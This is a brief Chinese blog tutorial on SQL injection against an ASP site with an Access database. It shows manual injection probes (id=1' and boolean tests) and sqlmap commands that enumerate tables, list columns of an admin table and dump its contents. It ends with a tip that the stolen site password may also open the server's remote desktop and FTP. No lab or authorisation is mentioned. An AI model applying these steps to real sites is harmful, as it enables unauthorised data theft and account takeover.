SQLMap注入Access

常见的asp搭配为: iss + Access/Mssql + asp

找到一个Access数据库

1.手工测试注入点: id=1',发现页面返回不正常

 

 

 继续测试 id=1' and 1=1         and 1=2  发现页面返回信息不一样

 

 

 

 

 

 于是打开PentestBox 掏出Vega 扫出高危漏洞

 

 

 

直接上sqlmap  -u "url" 测试漏洞  ,爆出一个布尔盲注

 

 

 

由于Access数据库的特性 不需要也没有办法获取数据库名称 所以 直接猜解表名 使用sqlmap自带的字典  爆破表名

参数 :  sqlmap -u "url"  --tables 

 

 

获得  admin  links news  三张表 很显然  admin 中是我们感兴趣的 所以使用

sqlmap -u "url" -T admin --columns   (指定表名获取字段)

 

 

 并没有发现password字段 ,有点小失望。

使用 sqlmap -u "url"  -T admin -C username --dump   指定表名 指定字段名 获取字段下的数据

但是这里 直接全部给我dump了出来 咱也不敢问 咱也不敢说

 

 

最后如果爆出password密码 一定要找到后台登陆,不然 等于白爆破 还有就是

网站的登陆密码可能=网站服务器的远程桌面服务登陆密码 = FTP登录密码

 ok 直到这里 关于Access注入 就完成了

posted @ 2020-10-29 17:52  二十四、  阅读(282)  评论(0编辑  收藏  举报